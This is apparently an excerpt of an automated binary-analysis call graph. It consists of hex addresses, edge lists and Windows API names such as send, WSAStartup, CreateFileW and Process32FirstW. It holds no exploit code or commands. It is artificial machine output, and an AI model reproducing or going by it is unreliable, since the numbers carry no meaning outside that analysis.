105207 3fd21a 82 API calls Mailbox 103680->105207 105208 3e89e0 53 API calls 103680->105208 105209 3ad772 55 API calls 103680->105209 103681->103682 103684 41a65e 103681->103684 103688 3b3a05 103681->103688 103689 3b3ab5 Mailbox 103682->103689 105190 3ed520 86 API calls 4 library calls 103682->105190 103685 3ad89e 50 API calls 103684->103685 103685->103628 103686 3b3a95 103687 3ad89e 50 API calls 103686->103687 103687->103682 103688->103628 103688->103682 103688->103686 103689->103184 103690->103184 103692 3ad8ac 103691->103692 103699 3ad8db Mailbox 103691->103699 103693 3ad8ff 103692->103693 103694 3ad8b2 Mailbox 103692->103694 103695 3ac935 48 API calls 103693->103695 103696 3ad8c7 103694->103696 103697 414e9b 103694->103697 103695->103699 103698 414e72 VariantClear 103696->103698 103696->103699 103697->103699 105216 3da599 InterlockedDecrement 103697->105216 103698->103699 103699->103157 103702 3acafd __NMSG_WRITE _memmove 103701->103702 103703 3c010a 48 API calls 103702->103703 103704 3acb3b 103703->103704 103704->103183 103705->103184 103706->103184 103707->103184 103708->103184 103709->103147 103710->103149 103712 3ac948 103711->103712 103713 3ac940 103711->103713 103712->103175 103714 3ad805 48 API calls 103713->103714 103714->103712 103715->103183 103716->103175 103717->103146 103718->103166 103719->103151 103720->103158 103721->103169 103821 3ad3d2 103722->103821 103724 3ff389 Mailbox 103725 3ff3cd 103724->103725 103726 3ff3e1 103724->103726 103741 3ff3a9 103724->103741 103832 3a7e53 103725->103832 103729 3ac935 48 API calls 103726->103729 103727 3ad89e 50 API calls 103739 3ff421 Mailbox 103727->103739 103730 3ff3df 103729->103730 103731 3ff429 103730->103731 103841 3fcdb5 413 API calls 103730->103841 103826 3fcd12 103731->103826 103734 3ff410 103734->103731 103736 3ff414 103734->103736 103735 3ff44b 103738 3ff4a2 103735->103738 103742 3ff457 103735->103742 103842 3ed338 86 API calls 4 library calls 103736->103842 103740 3ff34f 413 API calls 103738->103740 103739->103269 103740->103739 103741->103727 103742->103741 103743 3ff476 103742->103743 103843 3aca8e 103743->103843 103746 3b1606 103745->103746 103749 3b14b2 103745->103749 103746->103255 103748 3b156d 103748->103255 103751 3c010a 48 API calls 103749->103751 103760 3b14be 103749->103760 103750 3b14c9 103750->103748 103754 3c010a 48 API calls 103750->103754 103752 415299 103751->103752 103753 3c010a 48 API calls 103752->103753 103759 4152a4 103753->103759 103755 3b15af 103754->103755 103756 3b15c2 103755->103756 103968 3bd6b4 48 API calls 103755->103968 103756->103255 103758 3c010a 48 API calls 103758->103759 103759->103758 103759->103760 103760->103750 103969 3a346e 48 API calls 103760->103969 103761->103217 103762->103250 103763->103250 103764->103271 103765->103250 103766->103218 103767->103271 103768->103271 103769->103233 103770->103267 103772 3b469f 103771->103772 103773 3b4537 103771->103773 103776 3acaee 48 API calls 103772->103776 103774 417820 103773->103774 103775 3b4543 103773->103775 104147 3fe713 413 API calls Mailbox 103774->104147 103970 3b4040 103775->103970 103783 3b45e4 Mailbox 103776->103783 103779 3b4639 Mailbox 103779->103269 103780 41782c 103780->103779 104148 3ed520 86 API calls 4 library calls 103780->104148 103782 3b4559 103782->103779 103782->103780 103782->103783 103789 401f19 132 API calls 103783->103789 103985 3f1080 103783->103985 103988 3f6fc3 103783->103988 103991 3f9500 103783->103991 104000 3eefcd 103783->104000 104034 3f90d3 103783->104034 104039 3bf55e 103783->104039 104048 3edce9 103783->104048 104053 3a50ec 103783->104053 104057 40352a 103783->104057 104145 3f95af WSAStartup 103783->104145 103789->103779 103795->103259 103796->103266 103797->103272 103798->103269 103799->103243 103801 3a84be 103800->103801 103815 3a84ba 103800->103815 103802 415592 __i64tow 103801->103802 103803 415494 103801->103803 103804 3a84d2 103801->103804 103810 3a84ea __itow Mailbox _wcscpy 103801->103810 103805 41557a 103803->103805 103806 41549d 103803->103806 104702 3c234b 80 API calls 2 library calls 103804->104702 104703 3c234b 80 API calls 2 library calls 103805->104703 103806->103810 103812 4154bc 103806->103812 103809 3c010a 48 API calls 103811 3a84f4 103809->103811 103810->103809 103814 3acaee 48 API calls 103811->103814 103811->103815 103813 3c010a 48 API calls 103812->103813 103816 4154d9 103813->103816 103814->103815 103815->103260 103817 3c010a 48 API calls 103816->103817 103818 4154ff 103817->103818 103818->103815 103819 3acaee 48 API calls 103818->103819 103819->103815 103820->103249 103857 3c010a 103821->103857 103823 3ad3f3 103824 3c010a 48 API calls 103823->103824 103825 3ad401 103824->103825 103825->103724 103827 3fcd21 103826->103827 103828 3fcd46 103826->103828 103829 3aca8e 48 API calls 103827->103829 103828->103735 103830 3fcd2d 103829->103830 103888 3fc8b7 103830->103888 103833 3a7ecf 103832->103833 103835 3a7e5f __NMSG_WRITE 103832->103835 103956 3aa2fb 103833->103956 103836 3a7e7b 103835->103836 103837 3a7ec7 103835->103837 103952 3aa6f8 103836->103952 103955 3a7eda 48 API calls 103837->103955 103840 3a7e85 _memmove 103840->103730 103841->103734 103842->103739 103844 3aca9a 103843->103844 103845 3acad0 103843->103845 103850 3c010a 48 API calls 103844->103850 103846 3acad9 103845->103846 103847 3acae3 103845->103847 103848 3a7e53 48 API calls 103846->103848 103964 3ac4cd 103847->103964 103854 3acac6 103848->103854 103851 3acaad 103850->103851 103852 414f11 103851->103852 103853 3acab8 103851->103853 103852->103854 103855 3ad3d2 48 API calls 103852->103855 103853->103854 103856 3acaee 48 API calls 103853->103856 103854->103739 103855->103854 103856->103854 103860 3c0112 __calloc_impl 103857->103860 103859 3c012c 103859->103823 103860->103859 103861 3c012e std::exception::exception 103860->103861 103866 3c45ec 103860->103866 103880 3c7495 RaiseException 103861->103880 103863 3c0158 103881 3c73cb 47 API calls _free 103863->103881 103865 3c016a 103865->103823 103867 3c4667 __calloc_impl 103866->103867 103872 3c45f8 __calloc_impl 103866->103872 103887 3c889e 47 API calls __getptd_noexit 103867->103887 103870 3c462b RtlAllocateHeap 103870->103872 103879 3c465f 103870->103879 103872->103870 103873 3c4653 103872->103873 103876 3c4651 103872->103876 103877 3c4603 103872->103877 103885 3c889e 47 API calls __getptd_noexit 103873->103885 103886 3c889e 47 API calls __getptd_noexit 103876->103886 103877->103872 103882 3c8e52 47 API calls __NMSG_WRITE 103877->103882 103883 3c8eb2 47 API calls 6 library calls 103877->103883 103884 3c1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103877->103884 103879->103860 103880->103863 103881->103865 103882->103877 103883->103877 103885->103876 103886->103879 103887->103879 103890 3fc914 103888->103890 103891 3fc8f7 103888->103891 103946 3fc235 413 API calls Mailbox 103890->103946 103891->103890 103892 3fcc61 103891->103892 103893 3fc934 103891->103893 103894 3fcc6e 103892->103894 103895 3fcca9 103892->103895 103893->103890 103924 3dabf3 103893->103924 103942 3bd6b4 48 API calls 103894->103942 103895->103890 103899 3fccb6 103895->103899 103897 3fc964 103897->103890 103900 3fc973 103897->103900 103944 3bd6b4 48 API calls 103899->103944 103910 3fc9a1 103900->103910 103928 3da8c8 103900->103928 103901 3fcc87 103943 3e97b6 89 API calls 103901->103943 103905 3fccd6 103945 3e503c 91 API calls Mailbox 103905->103945 103907 3fcadc VariantInit 103914 3fcb11 _memset 103907->103914 103911 3fca4a 103910->103911 103938 3da25b 106 API calls 103910->103938 103911->103907 103912 3fca86 VariantClear 103911->103912 103912->103911 103913 3fcaa5 SysAllocString 103912->103913 103913->103911 103915 3fcb8e 103914->103915 103916 3fcbb4 103914->103916 103921 3fcc52 103921->103828 103925 3dac04 __NMSG_WRITE 103924->103925 103927 3dac16 103924->103927 103925->103927 103947 3a3bcf 103925->103947 103927->103897 103930 3da8f2 103928->103930 103929 3da9ed SysFreeString 103933 3da9f9 103929->103933 103930->103929 103931 3da90a 103930->103931 103932 3daa7e 103930->103932 103930->103933 103931->103910 103932->103931 103932->103933 103935 3daad9 SysFreeString 103932->103935 103936 3daac9 lstrcmpiW 103932->103936 103933->103931 103951 3da78a RaiseException 103933->103951 103935->103932 103936->103935 103937 3daafa SysFreeString 103936->103937 103937->103933 103938->103910 103942->103901 103943->103921 103944->103905 103945->103921 103946->103921 103948 3a3bd9 __NMSG_WRITE 103947->103948 103949 3c010a 48 API calls 103948->103949 103950 3a3bee _wcscpy 103949->103950 103950->103927 103951->103933 103953 3c010a 48 API calls 103952->103953 103954 3aa702 103953->103954 103954->103840 103955->103840 103957 3aa321 _memmove 103956->103957 103958 3aa309 103956->103958 103957->103840 103958->103957 103960 3ab8a7 103958->103960 103961 3ab8ba 103960->103961 103963 3ab8b7 _memmove 103960->103963 103962 3c010a 48 API calls 103961->103962 103962->103963 103963->103957 103965 3ac4e7 103964->103965 103967 3ac4da 103964->103967 103966 3c010a 48 API calls 103965->103966 103966->103967 103967->103854 103968->103756 103969->103750 103971 41787b 103970->103971 103974 3b406c 103970->103974 104150 3ed520 86 API calls 4 library calls 103971->104150 103973 41788c 104151 3ed520 86 API calls 4 library calls 103973->104151 103974->103973 103982 3b40a6 _memmove 103974->103982 103976 3b4175 103981 3b4185 103976->103981 104149 3fd21a 82 API calls Mailbox 103976->104149 103978 3c010a 48 API calls 103978->103982 103979 3b41f1 103979->103782 103980 3afa40 413 API calls 103980->103982 103981->103782 103982->103976 103982->103978 103982->103980 103982->103981 103983 4178d8 103982->103983 104152 3ed520 86 API calls 4 library calls 103983->104152 104153 3f22e5 103985->104153 103987 3f1090 103987->103779 103989 3a84a6 81 API calls 103988->103989 103990 3f6fd6 SetWindowTextW 103989->103990 103990->103779 104342 3acdb4 103991->104342 103993 3f9515 103994 3ebe47 50 API calls 103993->103994 103995 3f9522 103994->103995 103996 3f952f send 103995->103996 103997 3f9546 103996->103997 103998 3f9552 WSAGetLastError 103997->103998 103999 3f956a 103997->103999 103998->103999 103999->103779 104001 3a84a6 81 API calls 104000->104001 104002 3eeff2 104001->104002 104348 3e78ad GetFullPathNameW 104002->104348 104007 3ef04b CoInitialize CoCreateInstance 104009 3ef08e 104007->104009 104010 3ef070 104007->104010 104011 3a84a6 81 API calls 104009->104011 104012 3ef07a CoUninitialize 104010->104012 104013 3ef09d 104011->104013 104032 3ef23c Mailbox 104012->104032 104014 3ef0c1 104013->104014 104016 3a84a6 81 API calls 104013->104016 104016->104014 104032->103779 104035 3acdb4 48 API calls 104034->104035 104036 3f90e6 closesocket 104035->104036 104037 3f90f1 WSAGetLastError 104036->104037 104038 3f9106 104036->104038 104037->104038 104038->103779 104040 3acdb4 48 API calls 104039->104040 104041 3bf572 104040->104041 104042 4175d1 Sleep 104041->104042 104043 3bf57a timeGetTime 104041->104043 104044 3acdb4 48 API calls 104043->104044 104045 3bf590 104044->104045 104368 3ae1f0 104045->104368 104049 3a84a6 81 API calls 104048->104049 104050 3edcfc 104049->104050 104633 3e6d6d 104050->104633 104052 3edd06 104052->103779 104054 3a50f6 104053->104054 104055 3a5105 104053->104055 104054->103779 104055->104054 104056 3a510a CloseHandle 104055->104056 104056->104054 104058 3ad3d2 48 API calls 104057->104058 104059 40354a 104058->104059 104060 3ad3d2 48 API calls 104059->104060 104061 403553 104060->104061 104062 3ad3d2 48 API calls 104061->104062 104063 40355c 104062->104063 104064 3a84a6 81 API calls 104063->104064 104072 4035e9 Mailbox 104063->104072 104065 403580 104064->104065 104645 403d7b 104065->104645 104072->103779 104146 3f95e0 104145->104146 104146->103779 104147->103780 104148->103779 104149->103979 104150->103973 104151->103981 104152->103981 104154 3f2306 104153->104154 104155 3f230a 104154->104155 104156 3f2365 104154->104156 104157 3c010a 48 API calls 104155->104157 104222 3bf0f3 48 API calls 104156->104222 104159 3f2311 104157->104159 104160 3f231f 104159->104160 104209 3a5080 49 API calls 104159->104209 104162 3a84a6 81 API calls 104160->104162 104164 3f2331 104162->104164 104163 3f2379 104165 3f234d 104163->104165 104167 3f243f 104163->104167 104169 3f23bb 104163->104169 104210 3a4bf9 104164->104210 104165->103987 104225 3ebe47 104167->104225 104173 3a84a6 81 API calls 104169->104173 104171 3f2446 104229 3e689f SetFilePointerEx SetFilePointerEx WriteFile 104171->104229 104172 3f2341 104172->104165 104221 3a4592 CloseHandle 104172->104221 104180 3f23c2 104173->104180 104175 3f23f6 104191 3e67dc 104175->104191 104178 3f2400 104223 3a7b6e 48 API calls 104178->104223 104180->104175 104180->104178 104181 3f2410 104182 3ac935 48 API calls 104181->104182 104183 3f241a 104182->104183 104224 3a39e8 48 API calls 2 library calls 104183->104224 104185 3f23fe Mailbox 104185->104165 104187 3a50ec CloseHandle 104185->104187 104186 3f2428 104188 3e67dc 55 API calls 104186->104188 104189 3f2490 104187->104189 104188->104185 104230 3a4592 CloseHandle 104189->104230 104192 3e67ec 104191->104192 104193 3e67f6 104191->104193 104247 3e6917 SetFilePointerEx SetFilePointerEx WriteFile 104192->104247 104195 3e67fc 104193->104195 104196 3e6808 104193->104196 104248 3e68b9 51 API calls 104195->104248 104199 3e6824 104196->104199 104200 3e6811 104196->104200 104197 3e67f4 Mailbox 104197->104185 104231 3aa6d4 104199->104231 104201 3aa6d4 48 API calls 104200->104201 104203 3e6816 104201->104203 104249 3e66f8 50 API calls 104203->104249 104209->104160 104211 3a50ec CloseHandle 104210->104211 104212 3a4c04 104211->104212 104287 3a4b88 104212->104287 104214 3a4c44 104214->104163 104214->104172 104221->104165 104222->104163 104223->104181 104224->104186 104226 3ebe55 104225->104226 104227 3ebe50 104225->104227 104226->104171 104341 3eae06 50 API calls 2 library calls 104227->104341 104229->104185 104230->104165 104232 3c010a 48 API calls 104231->104232 104233 3aa6e7 104232->104233 104234 3aa6f8 48 API calls 104233->104234 104247->104197 104248->104197 104288 414957 104287->104288 104289 3a4ba1 CreateFileW 104287->104289 104290 41495d CreateFileW 104288->104290 104292 3a4bc3 104288->104292 104289->104292 104291 414983 104290->104291 104290->104292 104316 3a4ee9 104291->104316 104292->104214 104294 3a4df0 104292->104294 104296 3a4e10 104294->104296 104295 3a4e69 104296->104295 104297 3a4ee9 2 API calls 104296->104297 104306 3a4ebd 104296->104306 104341->104226 104343 3acdc5 104342->104343 104344 3acdca 104342->104344 104343->104344 104347 3c2241 48 API calls 104343->104347 104344->103993 104346 3ace07 104346->103993 104347->104346 104349 3a7e53 48 API calls 104348->104349 104350 3e78df 104349->104350 104362 3be617 104350->104362 104353 3f267a 104354 3f26a4 __NMSG_WRITE 104353->104354 104355 3ef039 104354->104355 104356 3f26d8 104354->104356 104359 3f2763 104354->104359 104355->104007 104360 3a39e8 48 API calls 2 library calls 104355->104360 104356->104355 104366 3bdfd2 60 API calls 104356->104366 104359->104355 104367 3bdfd2 60 API calls 104359->104367 104360->104007 104363 3be625 104362->104363 104364 3aa2fb 48 API calls 104363->104364 104365 3be635 104364->104365 104365->104353 104366->104356 104367->104359 104369 3ae216 104368->104369 104429 3ae226 Mailbox 104368->104429 104370 3ae670 104369->104370 104369->104429 104498 3becee 413 API calls 104370->104498 104372 3ae4fd 104372->103779 104374 3ae681 104374->104372 104376 3ae68e 104374->104376 104375 3ae26c PeekMessageW 104375->104429 104500 3bec33 413 API calls Mailbox 104376->104500 104378 415b13 Sleep 104378->104429 104379 3ae695 LockWindowUpdate DestroyWindow GetMessageW 104379->104372 104382 3ae6c7 104379->104382 104380 3ae4e7 104380->104372 104499 3a322e 16 API calls 104380->104499 104384 4162a7 TranslateMessage DispatchMessageW GetMessageW 104382->104384 104384->104384 104385 4162d7 104384->104385 104385->104372 104386 3ae657 PeekMessageW 104386->104429 104387 3c010a 48 API calls 104387->104429 104388 3ae517 timeGetTime 104388->104429 104390 3ac935 48 API calls 104390->104429 104391 3ae641 TranslateMessage DispatchMessageW 104391->104386 104392 415dfc WaitForSingleObject 104396 415e19 GetExitCodeProcess CloseHandle 104392->104396 104392->104429 104393 3ad3d2 48 API calls 104424 415cce Mailbox 104393->104424 104394 3a1000 389 API calls 104394->104429 104395 416147 Sleep 104395->104424 104396->104429 104397 3ae6cc timeGetTime 104501 3bcf79 49 API calls 104397->104501 104400 415feb Sleep 104400->104429 104404 4161de GetExitCodeProcess 104407 4161f4 WaitForSingleObject 104404->104407 104408 41620a CloseHandle 104404->104408 104406 415cea Sleep 104406->104429 104407->104408 104407->104429 104408->104424 104409 415cd7 Sleep 104409->104406 104410 408a48 108 API calls 104410->104424 104411 3a1dce 107 API calls 104411->104429 104413 416266 Sleep 104413->104429 104414 3bcf79 49 API calls 104414->104429 104417 3acaee 48 API calls 104417->104424 104419 3afa40 389 API calls 104419->104429 104422 3b44e0 389 API calls 104422->104429 104423 3b3680 389 API calls 104423->104429 104424->104393 104424->104404 104424->104406 104424->104409 104424->104410 104424->104413 104424->104417 104424->104429 104503 3e56dc 49 API calls Mailbox 104424->104503 104504 3bcf79 49 API calls 104424->104504 104505 3ad380 104424->104505 104509 3a1000 413 API calls 104424->104509 104511 3fd12a 50 API calls 104424->104511 104512 3e8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104424->104512 104513 3be3a5 timeGetTime 104424->104513 104514 3e6f5b CreateToolhelp32Snapshot Process32FirstW 104424->104514 104426 3ed520 86 API calls 104426->104429 104427 3acaee 48 API calls 104427->104429 104428 3ad380 55 API calls 104428->104429 104429->104375 104429->104378 104429->104380 104429->104386 104429->104387 104429->104388 104429->104390 104429->104391 104429->104392 104429->104394 104429->104395 104429->104397 104429->104400 104429->104406 104429->104411 104429->104414 104429->104419 104429->104422 104429->104423 104429->104424 104429->104426 104429->104427 104429->104428 104430 3ae7e0 104429->104430 104437 3aea00 104429->104437 104487 3bf381 104429->104487 104492 3bed1a 104429->104492 104497 3ae7b0 413 API calls Mailbox 104429->104497 104502 408b20 48 API calls 104429->104502 104510 3be3a5 timeGetTime 104429->104510 104431 3ae7fd 104430->104431 104433 3ae80f 104430->104433 104521 3adcd0 104431->104521 104552 3ed520 86 API calls 4 library calls 104433->104552 104435 3ae806 104435->104429 104436 4198e8 104436->104436 104438 3aea20 104437->104438 104439 3afa40 413 API calls 104438->104439 104443 3aea89 104438->104443 104441 419919 104439->104441 104440 4199bc 104567 3ed520 86 API calls 4 library calls 104440->104567 104441->104443 104564 3ed520 86 API calls 4 library calls 104441->104564 104446 3ad3d2 48 API calls 104443->104446 104468 3aeb18 104443->104468 104470 3aecd7 Mailbox 104443->104470 104444 3ad3d2 48 API calls 104447 419997 104444->104447 104448 419963 104446->104448 104566 3c1b2a 52 API calls __cinit 104447->104566 104565 3c1b2a 52 API calls __cinit 104448->104565 104449 3ed520 86 API calls 104449->104470 104452 3ad380 55 API calls 104452->104470 104454 419d70 104576 3fe2fb 413 API calls Mailbox 104454->104576 104455 3a342c 48 API calls 104455->104470 104456 419e49 104581 3ed520 86 API calls 4 library calls 104456->104581 104457 419dc2 104578 3ed520 86 API calls 4 library calls 104457->104578 104458 419ddf 104579 3fc235 413 API calls Mailbox 104458->104579 104460 3afa40 413 API calls 104460->104470 104466 419df7 104486 3aef0c Mailbox 104466->104486 104580 3ed520 86 API calls 4 library calls 104466->104580 104467 3b14a0 48 API calls 104467->104470 104468->104444 104468->104470 104470->104440 104470->104449 104470->104452 104470->104454 104470->104455 104470->104456 104470->104457 104470->104458 104470->104460 104470->104467 104471 3af56f 104470->104471 104474 419a3c 104470->104474 104470->104486 104560 3ad805 104470->104560 104568 3ea3ee 48 API calls 104470->104568 104569 3fede9 413 API calls 104470->104569 104574 3da599 InterlockedDecrement 104470->104574 104575 3ff4df 413 API calls 104470->104575 104471->104486 104577 3ed520 86 API calls 4 library calls 104471->104577 104570 3fd154 48 API calls 104474->104570 104476 419a48 104478 419a56 104476->104478 104479 419a9b 104476->104479 104571 3ea485 48 API calls 104478->104571 104482 419a91 Mailbox 104479->104482 104572 3eafce 48 API calls 104479->104572 104480 3afa40 413 API calls 104480->104486 104482->104480 104486->104429 104488 41ee11 104487->104488 104489 3bf390 104487->104489 104490 41ee46 104488->104490 104491 41ee28 TranslateAcceleratorW 104488->104491 104489->104429 104491->104489 104493 3bed2c 104492->104493 104494 3bed34 104492->104494 104493->104429 104494->104493 104495 3bed5e IsDialogMessageW 104494->104495 104496 41ebec GetClassLongW 104494->104496 104495->104493 104495->104494 104496->104494 104496->104495 104497->104429 104498->104380 104499->104374 104500->104379 104501->104429 104502->104429 104503->104424 104504->104424 104506 3ad38b 104505->104506 104507 3ad3b4 104506->104507 104582 3ad772 55 API calls 104506->104582 104507->104424 104509->104424 104510->104429 104511->104424 104512->104424 104513->104424 104583 3e79c2 104514->104583 104516 3e6fa4 Process32NextW 104517 3e7021 CloseHandle 104516->104517 104518 3e6fa0 _wcscat 104516->104518 104517->104424 104518->104516 104518->104517 104589 3c297d 104518->104589 104592 3c1bc7 104518->104592 104522 3afa40 413 API calls 104521->104522 104535 3add0f _memmove 104522->104535 104523 418dbe 104559 3ed520 86 API calls 4 library calls 104523->104559 104525 418ddc 104525->104525 104526 3add70 104526->104435 104527 3ae12b Mailbox 104529 3c010a 48 API calls 104527->104529 104528 3ae051 104531 3ae066 104528->104531 104532 418daf 104528->104532 104543 3adecb _memmove 104529->104543 104530 3c010a 48 API calls 104530->104535 104533 3c010a 48 API calls 104531->104533 104558 3fd1da 50 API calls 104532->104558 104542 3adf64 104533->104542 104535->104523 104535->104526 104535->104527 104535->104530 104537 3adeb7 104535->104537 104547 3adf29 104535->104547 104536 3adef6 104536->104547 104553 3b4320 413 API calls 104536->104553 104537->104527 104539 3adec4 104537->104539 104538 3c010a 48 API calls 104538->104536 104541 3c010a 48 API calls 104539->104541 104540 418d9e 104557 3ed520 86 API calls 4 library calls 104540->104557 104541->104543 104542->104435 104543->104536 104543->104538 104543->104547 104547->104528 104547->104540 104547->104542 104548 418d76 104547->104548 104550 418d51 104547->104550 104554 3a5322 413 API calls 104547->104554 104556 3ed520 86 API calls 4 library calls 104548->104556 104555 3ed520 86 API calls 4 library calls 104550->104555 104552->104436 104553->104547 104554->104547 104555->104542 104556->104542 104557->104542 104558->104523 104559->104525 104561 3ad828 _memmove 104560->104561 104562 3ad815 104560->104562 104561->104470 104562->104561 104563 3c010a 48 API calls 104562->104563 104563->104561 104564->104443 104565->104468 104566->104470 104567->104486 104568->104470 104569->104470 104570->104476 104571->104482 104574->104470 104575->104470 104576->104471 104577->104486 104578->104486 104579->104466 104580->104486 104581->104486 104582->104507 104584 3e79e9 104583->104584 104588 3e79d0 104583->104588 104603 3c224a 58 API calls __wcstoi64 104584->104603 104587 3e79ef 104587->104518 104588->104584 104588->104587 104602 3c22df GetStringTypeW __towlower_l 104588->104602 104604 3c29c7 104589->104604 104593 3c1c48 104592->104593 104594 3c1bd3 104592->104594 104632 3c1c5a 59 API calls 3 library calls 104593->104632 104601 3c1bf8 104594->104601 104630 3c889e 47 API calls __getptd_noexit 104594->104630 104598 3c1bdf 104601->104518 104602->104588 104603->104587 104605 3c29e2 104604->104605 104609 3c29d6 104604->104609 104628 3c889e 47 API calls __getptd_noexit 104605->104628 104609->104605 104614 3c2a55 104609->104614 104623 3ca9fb 47 API calls __woutput_l 104609->104623 104614->104605 104623->104614 104630->104598 104635 3e6d8a __NMSG_WRITE 104633->104635 104634 3e6db3 GetFileAttributesW 104636 3e6dc5 GetLastError 104634->104636 104643 3e6de3 104634->104643 104635->104634 104637 3e6de7 104636->104637 104638 3e6dd0 CreateDirectoryW 104636->104638 104639 3a3bcf 48 API calls 104637->104639 104637->104643 104638->104637 104638->104643 104640 3e6df7 _wcsrchr 104639->104640 104641 3e6d6d 48 API calls 104640->104641 104640->104643 104642 3e6e1b 104641->104642 104642->104643 104644 3e6e28 CreateDirectoryW 104642->104644 104643->104052 104644->104643 104646 3ac4cd 48 API calls 104645->104646 104647 403d89 104646->104647 104648 3ac4cd 48 API calls 104647->104648 104649 403d91 104648->104649 104650 3ac4cd 48 API calls 104649->104650 104651 403d99 104650->104651 104652 403e01 104651->104652 104692 3aa4f6 104651->104692 104654 3ac4cd 48 API calls 104652->104654 104693 3ab8a7 48 API calls 104692->104693 104702->103810 104703->103810 104704->103311 104705->103311 104706->103311 104707->103311 104708->103311 104709->103306 104710->103303 104711->103286 104712->103280 104713->103288 104714->103296 104716 3e7700 104715->104716 104727 3e76f9 _wcsncpy 104715->104727 104717 3c010a 48 API calls 104716->104717 104718 3e7706 GetFileVersionInfoW 104717->104718 104719 3e7722 __NMSG_WRITE 104718->104719 104720 3c010a 48 API calls 104719->104720 104722 3e7739 _wcscat _wcscmp _wcscpy _wcsstr 104720->104722 104721 3c1bc7 _W_store_winword 59 API calls 104723 3e77f7 104721->104723 104725 3e7779 75381560 104722->104725 104729 3e7793 _wcscat 104722->104729 104724 3e7827 75381560 104723->104724 104723->104727 104726 3e783d _wcscmp 104724->104726 104724->104727 104725->104729 104726->104727 104730 3c234b 80 API calls 2 library calls 104726->104730 104727->103336 104729->104721 104730->104727 104732 3bf069 104731->104732 104733 3bf057 104731->104733 104736 3ac4cd 48 API calls 104732->104736 104734 3bf05d 104733->104734 104735 3bf063 104733->104735 104738 3aa6d4 48 API calls 104734->104738 104737 3aa6d4 48 API calls 104735->104737 104746 3e64f5 104736->104746 104739 3e668b 104737->104739 104741 3bf081 104738->104741 104742 3a4c4f 50 API calls 104739->104742 104740 3e6524 104740->103376 104766 3a4c4f 104741->104766 104745 3e6699 104742->104745 104753 3e66a9 Mailbox 104745->104753 104793 3e6765 50 API calls 104745->104793 104746->104740 104791 3e649b ReadFile SetFilePointerEx 104746->104791 104792 3abd2f 48 API calls _memmove 104746->104792 104748 4149b2 104752 3bf0a3 Mailbox 104752->103376 104753->103376 104755 3a7c3a 104754->104755 104756 3a7bfb 104754->104756 104757 3ac935 48 API calls 104755->104757 104759 3c010a 48 API calls 104756->104759 104758 3a7c0e 104757->104758 104758->103380 104759->104758 104760->103353 104761->103381 104762->103350 104763->103356 104764->103372 104765->103379 104767 3bf324 48 API calls 104766->104767 104770 3a4c60 104767->104770 104768 3a4ca0 2 API calls 104768->104770 104769 3a4c95 104769->104748 104772 3ac610 MultiByteToWideChar 104769->104772 104770->104768 104770->104769 104794 3a4d29 104770->104794 104773 3ac638 104772->104773 104774 4124df 104772->104774 104775 3c010a 48 API calls 104773->104775 104776 3ac4cd 48 API calls 104774->104776 104777 3ac64f MultiByteToWideChar 104775->104777 104778 4124e7 104776->104778 104779 3ac66c 104777->104779 104780 3ac6b7 104777->104780 104783 3aa6f8 48 API calls 104778->104783 104779->104780 104784 3ac675 104779->104784 104781 3aa2fb 48 API calls 104780->104781 104782 3ac6c3 104781->104782 104782->104752 104785 4124f6 104783->104785 104784->104778 104787 3ac686 104784->104787 104786 3c010a 48 API calls 104785->104786 104788 412518 104786->104788 104789 3ac68e _memmove 104787->104789 104790 3c010a 48 API calls 104787->104790 104789->104752 104790->104789 104791->104746 104792->104746 104793->104753 104795 3a4d3d 104794->104795 104796 4145cf 104794->104796 104803 3a4d67 104795->104803 104798 3aa6f8 48 API calls 104796->104798 104800 4145da 104798->104800 104799 3a4d49 104799->104770 104801 3c010a 48 API calls 104800->104801 104802 4145ef _memmove 104801->104802 104804 3a4d7d 104803->104804 104807 3a4d78 _memmove 104803->104807 104805 3c010a 48 API calls 104804->104805 104806 414703 104804->104806 104805->104807 104807->104799 104809 3ad89e 50 API calls 104808->104809 104810 3a1a08 104809->104810 104811 3a1a12 104810->104811 104812 41db7d 104810->104812 104814 3a84a6 81 API calls 104811->104814 104813 3a7e53 48 API calls 104812->104813 104815 41db8d 104813->104815 104816 3a1a1f 104814->104816 104815->104815 104817 3ac935 48 API calls 104816->104817 104818 3a1a2d 104817->104818 104819 3a1dce 104818->104819 104820 3a1de4 Mailbox 104819->104820 104821 41db26 104820->104821 104822 3a1dfd 104820->104822 104823 41db2b IsWindow 104821->104823 104824 3a1e46 104822->104824 104828 3a84a6 81 API calls 104822->104828 104825 3a1e51 104823->104825 104826 41db3f 104823->104826 104824->104825 104830 41db65 IsWindow 104824->104830 104825->103389 104887 3a200a 104826->104887 104831 3a1e17 104828->104831 104830->104825 104830->104826 104834 3a1f04 104831->104834 104835 3a1f1a Mailbox 104834->104835 104836 3ac935 48 API calls 104835->104836 104837 3a1f3e 104836->104837 104838 3ac935 48 API calls 104837->104838 104839 3a1f49 104838->104839 104840 3a7e53 48 API calls 104839->104840 104841 3a1f59 104840->104841 104842 3ad3d2 48 API calls 104841->104842 104843 3a1f87 104842->104843 104844 3ad3d2 48 API calls 104843->104844 104845 3a1f90 104844->104845 104846 3ad3d2 48 API calls 104845->104846 104847 3a1f99 104846->104847 104848 412569 104847->104848 104849 3a1fac 104847->104849 104897 3de4ea 60 API calls 3 library calls 104848->104897 104850 412583 104849->104850 104852 3a1fbe GetForegroundWindow 104849->104852 104853 3aa4f6 48 API calls 104850->104853 104854 3a200a 48 API calls 104852->104854 104855 412597 104853->104855 104857 3a1fcc 104854->104857 104856 412899 104855->104856 104858 3aa4f6 48 API calls 104855->104858 104859 3a197e 48 API calls 104857->104859 104888 3a2016 104887->104888 104889 3c010a 48 API calls 104888->104889 104890 3a2023 104889->104890 104891 3a197e 104890->104891 104892 3a1990 104891->104892 104896 3a19af _memmove 104891->104896 104894 3c010a 48 API calls 104892->104894 104893 3c010a 48 API calls 104895 3a19c6 104893->104895 104894->104896 104895->104825 104896->104893 104897->104850 104932->103403 104933->103419 104934->103419 104935->103429 104936->103422 104937->103419 104938->103417 104940 4023eb _memset 104939->104940 104941 402452 104940->104941 104942 402428 104940->104942 104944 3acdb4 48 API calls 104941->104944 104948 402476 104941->104948 104943 3acdb4 48 API calls 104942->104943 104945 402433 104943->104945 104947 402448 104944->104947 104945->104948 104950 3acdb4 48 API calls 104945->104950 104946 4024b0 104949 3a84a6 81 API calls 104946->104949 104953 3acdb4 48 API calls 104947->104953 104948->104946 104951 3acdb4 48 API calls 104948->104951 104952 4024d4 104949->104952 104950->104947 104951->104946 104954 3a3bcf 